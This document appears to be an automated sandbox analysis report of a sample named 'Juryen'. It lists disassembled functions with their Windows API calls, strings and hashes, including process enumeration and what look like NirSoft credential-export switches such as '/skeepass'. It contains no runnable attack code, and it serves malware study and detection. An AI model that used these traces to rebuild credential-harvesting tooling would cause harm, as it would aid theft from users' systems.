                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                    • malloc.MSVCRT ref: 004186B7
                                                                    • free.MSVCRT ref: 004186C7
                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                    • free.MSVCRT ref: 004186E0
                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                    • malloc.MSVCRT ref: 004186FE
                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                    • free.MSVCRT ref: 00418716
                                                                    • free.MSVCRT ref: 0041872A
                                                                    • free.MSVCRT ref: 00418749
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                    • String ID: |A
                                                                    • API String ID: 3356672799-1717621600
                                                                    • Opcode ID: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                    • Opcode Fuzzy Hash: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                    • API String ID: 2081463915-1959339147
                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2012295524-70141382
                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                    • API String ID: 667068680-3953557276
                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1700100422-0
                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                    • String ID:
                                                                    • API String ID: 552707033-0
                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                    • strchr.MSVCRT ref: 0040C140
                                                                    • strchr.MSVCRT ref: 0040C151
                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                    • memset.MSVCRT ref: 0040C17A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                    • String ID: 4$h
                                                                    • API String ID: 4066021378-1856150674
                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: %%0.%df
                                                                    • API String ID: 3473751417-763548558
                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                    • GetParent.USER32(?), ref: 00406136
                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                    • String ID: A
                                                                    • API String ID: 2892645895-3554254475
                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                    APIs
                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                    • memset.MSVCRT ref: 0040DA23
                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                    • String ID: caption
                                                                    • API String ID: 973020956-4135340389
                                                                    • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                    • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                    APIs
                                                                    Strings
                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                    • API String ID: 1283228442-2366825230
                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00413972
                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                    • memset.MSVCRT ref: 004139B8
                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                    • memset.MSVCRT ref: 00413A00
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                    • String ID: \systemroot
                                                                    • API String ID: 4173585201-1821301763
                                                                    • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                    • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy
                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                    • API String ID: 1284135714-318151290
                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 4066108131-3849865405
                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004082EF
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memset.MSVCRT ref: 00408362
                                                                    • memset.MSVCRT ref: 00408377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 290601579-0
                                                                    • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                    • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                    APIs
                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                    • memset.MSVCRT ref: 0044505E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
